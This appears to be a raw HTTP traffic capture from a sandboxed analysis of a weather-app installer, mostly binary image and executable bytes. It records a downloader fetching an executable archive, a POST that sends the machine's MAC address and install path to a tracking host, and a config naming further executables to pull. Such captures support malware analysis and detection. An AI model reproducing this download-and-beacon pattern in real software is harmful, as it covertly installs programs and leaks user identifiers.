GIF89a................$..................O...........FC...............QRR...{......{z.......m..li......fff......B...... %.<3.......l2.o.el......8.nWz{{58=.J....#r.T.....'....r|......Z.x4....&&'S.z..............3......YQ.............El..d,...4?......e...W...e.R}.....v....-......... *.f...vQ...9.h..............b....s..r.....M.{dY.x.....F.IJw..j....l...)p]_..6.R...Xeqy2AvcY."y....i.....f..........!.....~.,............~..............x.....x......;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:25 GMT..Content-Type: image/gif..Content-Length: 447..Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:25 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a................$..................O...........FC...............QRR...{......{z.......m..li......fff......B...... %.<3.......l2.o.el......8.nWz{{58=.J....#r.T.....'....r|......Z.x4....&&'S.z..............3......YQ.............El..d,...4?......e...W...e.R}.....v....-......... *.f...vQ...9.h..............b....s..r.....M.{dY.x.....F.IJw..j....l...)p]_..6.R...Xeqy2AvcY."y....i.....f..........!.....~.,............~..............x.....x......;t>....
GET /imgu/2014/05/20140513112717_7.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p7.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 11976
Last-Modified: Tue, 13 May 2014 03:27:17 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......Exif..II*.................Ducky.......d.....mhXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1D83D2A5C09EE3119F67BC560D35722B" xmpMM:DocumentID="xmp.did:94D6195DD97C11E3BF6BA573D74A4472" xmpMM:InstanceID="xmp.iid:94D6195CD97C11E3BF6BA573D74A4472" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02B321837BD9E311B9DCEA1BD6C26215" stRef:documentID="xmp.did:1D83D2A5C09EE3119F67BC560D35722B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................k._................................................................................................!..1..AQ"..aq.2#...B$....3..Rr.Cc.&.........................!..1A.Qaq"...2....B...r#...b.34.RCs$5.6............?..S.........8z*.S./...].v.s/......5.t...6.......q[z5.....SXF4.H...0S......c....7.E...;F.I)...E..<.T.~-...c.q>.m...3.-.KL....d.H&R*...{..a.......W.n.....7.b...r6.d...i......7....xe.fp.
<<
<<< skipped >>>
GET /cnzz/weather/weatherPng/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:56 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT
Connection: keep-alive
ETag: "52b1098d-2"
Accept-Ranges: bytes
OKHTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:56 GMT..Content-Type: text/html..Content-Length: 2..Last-Modified: Wed, 18 Dec 2013 02:33:49 GMT..Connection: keep-alive..ETag: "52b1098d-2"..Accept-Ranges: bytes..OK..
GET /favicon.ico HTTP/1.1
User-Agent: ...............
Host: lvdou.300duo.com
Connection: Keep-Alive
HTTP/1.1 302 Object moved
Date: Tue, 13 May 2014 04:49:23 GMT
Server: Microsoft-IIS/6.0
Location: hXXp://123.sogou.com/?22014
Content-Length: 148
Content-Type: text/html
Set-Cookie: daohang=0; path=/
Set-Cookie: ASPSESSIONIDAAQBQDRT=JPBGIBHAFGFCCDGADMHIOFKD; path=/
Cache-control: private
<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>.HTTP/1.1 302 Object moved..Date: Tue, 13 May 2014 04:49:23 GMT..Server: Microsoft-IIS/6.0..Location: hXXp://123.sogou.com/?22014..Content-Length: 148..Content-Type: text/html..Set-Cookie: daohang=0; path=/..Set-Cookie: ASPSESSIONIDAAQBQDRT=JPBGIBHAFGFCCDGADMHIOFKD; path=/..Cache-control: private..<head><title>Object moved</title></head>.<body><h1>Object Moved</h1>This object may be found <a HREF="hXXp://123.sogou.com/?22014">here</a>.</body>...
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p1.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /imgn/sehome/tjv1/subnav_v41.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 3655
Last-Modified: Mon, 28 Jan 2013 13:46:09 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...............x.....sBIT.....O.....PLTE"5R..L4s...$.?....fff............iV*.ji......t.........hC...)Bd.....k...........f......9..............Q`w..Y[ZZ.......YRGGG;`......k.4/..B..E...J..f..........`.....}...-D.....zq...f......rP..T........N....eW...i|...r..`..LGt...dR....<..................O....T..........MI.../Kr.J-...........t..e.....}}.....333..I......wvw`..I}........iC......4U.....( .................3.....W.....:.."w....S........n..x.....B.....\..sAj...r..b........d...........}b...........IYq...9X......Jr......m9.....Q.........].......a..:.yR..G......Lz.k..........~..f........IEq...Qp........... Fj................................m..Ko....^9].........z........jW........T....S7Qs.....[..W..C..J....................................b..Cm.R}............J..')Jk{.......:..cl..=d......k..;..H.....jLt.B..f....tRNS................................................................................................................................................................................................................................................................s.......pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com
<<
<<< skipped >>>
GET /imgn/v32/titlebg.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/png
Content-Length: 2842
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............b.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /u/js/ufo2.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 06 Nov 2012 08:12:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Tue, 20 May 2014 04:49:25 GMT
Cache-Control: max-age=604800
Content-Encoding: gzip
600a...............v.G....<.....X.D.={...m.....MK.v7I{.R.A.......<.y..d.......!.g.Y..ZDU.=#.......]..M.|.....o.O..^..=\\.m..b9y4......{...j.o...t1o..A.6>..G...}._....O.g....e..Y....e.x...W.....j...M.[....Yw..]..../{...b......n.;x..../F..w.%.G.Y.m....a.`.^.....l~S4.?:j......7..Y.U6[..n.=).......f]6..1..io1...../.I.u.^...u.mc..).....{..g =....f6k..o.`t.hPa.;.u.n....9j..............3.......u{w....4.J.....]X.Q...NK{<^,....|..f...Q.4.<.nOW_]]...0.(..f.dp.j.....t~S....f..h.e.h.(..&.....y... {..g.....f.........f.?.6.(.s.@5Z..........l...g.G..[....*.@u...cm...y.....@r..P>N.............l.wE?u%....l....Y...>u.W.~.9.T0..G..........g.;(..js.Og..8a......V.W..`;.......?_.........a.q.....*..Y8..M.U.9h.e._._..7W@..e....B6e..~5 ..u..<h...d}....4....u..Jp:.v...0...xhx..........9h.<>.........P5.!-...e..v..WM.K.Eg(....0.n..W_.QN.v...}.e1f.....*&.aP.[.yw.._.. ..3...r].Mhr>...$|.6.....SN.G..E.=.y..;.=).G...[0.Zm.G#.`X..........y...?.O.v..4o..M.... ..MGc..>B...fV......<....~o_..IY/.........]....C.0....2..aN........w....w..n.n....u.|}5....b^..L....?x.>...h#.lY...&..V.c#...o. ..k?....vK#.....l....^.`..0..t./..u.vS.H}.e....&v....m....02\.b?v.".......... .W.0......=z..p9...0..k..~....Z...\.W...N.i....."?5.3..p.....m....t^....e....V'5c...|..|6.nb..W?9....,[;.\....K......F..8`...~.p...cq"....N..=.C.<j....x.S<.....C."^..g.C;w.}D,......Q..`....V|h..._.w..N....0.%..?.S....|.R}..........1......t<~29...A.N.g.....Z......H.....Ec1.....^s_..<....[.7{...!.....u2.... ...b8.A1.B8-...]._7.Z5.0.....
<<
<<< skipped >>>
GET /update/365/365weatherIns_61.rar HTTP/1.0
Host: lm.beilequ.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Tue, 13 May 2014 04:39:38 GMT
Content-Type: application/x-rar-compressed
Content-Length: 1038034
Last-Modified: Fri, 21 Mar 2014 05:24:42 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\...........2.......p....@..........................`...............................................s.......p...............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...x............r..............@....ndata...0...@...........................rsrc........p.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..X...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<
<<< skipped >>>
GET /cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:50:02 GMT
Content-Type: text/html
Content-Length: 198
Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT
Connection: keep-alive
ETag: "534e50ed-c6"
Accept-Ranges: bytes
a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bbabd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:50:02 GMT..Content-Type: text/html..Content-Length: 198..Last-Modified: Wed, 16 Apr 2014 09:44:13 GMT..Connection: keep-alive..ETag: "534e50ed-c6"..Accept-Ranges: bytes..a556f5dd20dcbdfb274d34f5c504a160$2d204d39f2faa25896874c01c0135d760$bca7b8d364fc9c89c96702a19aa47a00$d8099717b5894a1c926de4f6fe36e650$bf60bbabd09f5e0270f38adbc02d36b0$b982497d26da6f0218296012b54c5ab0....
GET /cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml HTTP/1.1
User-Agent: mfc5002
Host: weather51la.cnzz.uujzy.com
Cache-Control: no-cache
Cookie: city=101010100
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:50:04 GMT
Content-Type: text/xml
Content-Length: 509
Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT
Connection: keep-alive
ETag: "532bbe8a-1fd"
Accept-Ranges: bytes
<html>..<title>........</title> ..<body scroll=no>..<skin>..<name>skin.xml</name>..<path>http://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f9225ae0a0eb80212b98f</hash>..<size>0</size>..<type>0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$cnzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>..</skin>..</body>..</html>HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:50:04 GMT..Content-Type: text/xml..Content-Length: 509..Last-Modified: Fri, 21 Mar 2014 04:22:34 GMT..Connection: keep-alive..ETag: "532bbe8a-1fd"..Accept-Ranges: bytes..<html>..<title>........</title> ..<body scroll=no>..<skin>..<name>skin.xml</name>..<path>http://conf.f.360.cn/status.html</path>..<hash>ffa9975d557f9225ae0a0eb80212b98f</hash>..<size>0</size>..<type>0</type>..<cnzz>hXXp://int.dpool.sina.com.cn/iplookup$cnzz_ID_0</cnzz>..<cfg>hXXp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/</cfg>..<cfg>hXXp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/</cfg>..<tqy>AQI.5002.exe</tqy>..<chx>worldWeatherRealTime5002.exe</chx>.
<<
<<< skipped >>>
GET /imgu/2013/08/20130820165531_481.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p6.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/gif
Content-Length: 2049
Last-Modified: Tue, 20 Aug 2013 08:55:31 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..y....1.....A.....c........t..S........9........I........Y..j...........<..L.....y.................X...........T..s.....J..J..a..c....................................................................!.....*.,......y....@.pH,....r.l:...tJ.*.X.*......6.]...3Z.^.........^..m........M\fDyH.[G.t.D.t.D........D..Y.X..D..........C..............c_x.......K..J. C.J....*..H......I.Y...I....J....".....G..X..H.....@.......".`O..e.28A....%..a..B... C...a...I.....$..EF\h@....E.. 2........h0d...H."e9AH....X.....1.....5...U.....lY,....I....B..@bA...x....$.......'.....@ 8".Wc.]..U. ...."\.PYX...@.8..C....aY.....q..;....8..A.;...............@..%....................s.....@..x..>.p..C,..H@..@......".]...u.B...0.....S...A.].."A......X(.............z\80Ak...@...@....p....g..#)..v.p... .$@..-.M.....E.,.@rBd....ET...\D..X.Q......9Ch..\B..@.ExW...`..5.`..[CH..5Hx."...@X..,..nF .H0W0....F...*P..I.@P.5..9...Q...&%.....0.wX.p....!......{XL"`..0P.v.bq....`A..0.......}h9....(@..]9......M\.T.... ...........W......:P.p.d?.DG.B..OA.<. .....U&..U.x.y...c..F......E..eT..g..@......q...z....A..X...C.gQ..Bh....(...@.....,...(4...Ll....`.4.....5.p...D.pY.>.,F...q.......K..A.X.)....-.......B.Pc....x .0p.`.0...^....C|l.........V..........!.".*3.BT........oX B&.q...s.$`....@...b.mP.......L]..m^@......!..A..k.6.b.yD..d.....o.Gc.$L.y..Bj^...S..O.S...............R?.E.Fz... .9....&.P.9@......j...w%...m]............ ..@...........&$...`*..n.C....?....0..0 b.b..Dh..0....L.aH.*R..(.........>F.M.p(.S...g<.....5.!Bi,...t.9.....c..p..de..
<<
<<< skipped >>>
GET /jsn/v33_sugg_ajaj_v40_3.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Aug 2013 03:01:34 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
12ba.............Z{w.........5{<."..;..Y.q...W<..;.\6.A.d..........VK.;...............5J.a..~-..Az...*..W.HM....j.....XJ0xt..R_. k.es...c.l..Y.Dz.;.......m...HUn..gJ}..k...,...z.:.3...J&n.-,6^.s..5...vS...`...Oc..Bw..z...T.Rz..4qm.~.N.T4...8.?`...........N.I......6....}...F.......9....v....;q....h...A4c....V...F.....k&j..a...91#.n....x...s.....N..`.h$M......}....?...?...=Yl..8K...................k.ZhA.o...ol.}...p....~n9I.. ..$.......L...w.......g....H...|f...4ADSy.(.......=^..v....v.'......u...gC..'*..*....#....Z......o..*.#'I#.v.....s.\>..6......5[c.|Vb.....l.l..k7N...._..D.....4.$l8.d...J..........m.....%.Z.F..-...>.3...k....a.D....U... 3U...]...w........c2...(..a...VO.$I.........s}...M9N.q.=.....9.0..._...,.|.He....r...........>g^....u.%....7.....DU..*..J....R'i.h%Q@.<.........%.7..%pVbO....V1'!!^..}...caj.b\......Qv....(.i.S.."..|...a..1..........X.....l.,9n....x0..6Tg........S.8.36&K..hhA....U.T.J....-.'.J..i..)...l.5.v.ih..w..l...fS.y..5...7o....i...P ..V......x.M..Z4.:h.@.-g..S..h.8.ss.C1i....4Z.Q...<..|.{X.o`!_..K.P.....a....>./...*/.|......m.X.W.!.....$...r(..4.....0|..|.* LzF.3->..k..:.X...\.].........Q..{._....'........Q9M.........q...........K.....GH..I..c.U....e>.../.'=N...-......W..^Y.p.!..>]..:.NU..GM..^o.9N.%.(GAD.v.&I...!.s.q2..F..q...."h....%...o.".M......H)..,...(..,z@.uI|...{..*....`x.....:...A..S......r.?}....!.`.0..&..!..#.#";.#....e3.0gG.J.=#..a.......Oz.|.q`..D.L... .z.....#..=6t.RTla)...[Gz'B3..:...b.SZ.}#W9.W...Vi....U>.)W.g....dZ(.. ....S.j>...#
<<
<<< skipped >>>
POST /post/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.xzsky.com
Content-Length: 137
Connection: Keep-Alive
Cache-Control: no-cache
mac=00-0C-29-8A-8B-37&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=318d97cc71dd4de571edddf8241ae5c0
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.15
0..HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:38 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.3.15..0..
GET /pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=00DD04B9C18AF4E75371A458B1D10495; expires=Fri, 10-May-24 04:49:28 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:28 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..Set-Cookie: SUV=00DD04B9C18AF4E75371A458B1D10495; expires=Fri, 10-May-24 04:49:28 GMT; domain=.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..
GET /imgn/v51/new-erweima2.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: image/png
Content-Length: 18683
Last-Modified: Mon, 08 Jul 2013 10:16:12 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:28 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...,...,........"..H.IDATx....x.U..'.R.D.Q....*...]A.;".".... 5$.%....I.=....^............?.I\2w.,......'..\....;..s....D......H.!.D..H$..D".I$.AH"..$.. $..B.... ...tuu..lcc..=.....}.6v.....S.wbaa..Dv..[$.|..!.=..9.....d....;......[?w..M..'.l....[.....d.....U.. $..B.. $..B.. $..B.. $..B.. $......AH..!|....t.....:.?......c........gi.....:::.s.p........{^.j.....~X..B1!...g..|.r.9..;W........J......yx>>>.sdB.....T..I.bgm.......~.Mu......V.....j....P4.d.........4n.MEK..1...5.tjjj............O^.h.....F.<..:...!AH....!AH....!AH....!A.~......yE.H.....!Ax..v..d..............j....U....*.%x..{d:.:.B.._vv.........."l..$.......OSS...g....y..'......l......rrr..z.@(..3..T<.].B......!CT.Ph.d.U. ...2....,.p.....@$::Z.........x.T<A<..!AH....!AH....!AH....!AH....!A..!...y.&L...@...c.......j.........(.....,l.k....7z..N.P^....O.....2R.!.qGA(..$.;.Y.........w[...C........l.qI....,!AH....!AH.>x..t.@(..!Te%aGA...".....!..QY..Z....5..d....%$..B.. $..B....N..[o.....^b6.>|.(.._..K?..#s.....6F.@f.....6......w.Q...={V........VVV2/..o.).AOO.y....#?.}l.;Y.V. 